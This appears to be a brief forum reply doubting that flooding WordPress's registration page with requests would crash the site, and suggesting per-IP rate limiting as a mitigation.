Aren't you just sending lots of requests to register users? I'm presuming you chose this because it's one of the most comutationally heavy pages for the PHP to run.
I don't see how this would crash unless the server is what fails, not WP itself. I suppose the only way to fix (within WP) would be to limit one IP to x number of registrations per time slot.
Furthermore, it would be silly to use this on a live site as the logs would quite blatantly point back to you and it would be extremely easy to spot.
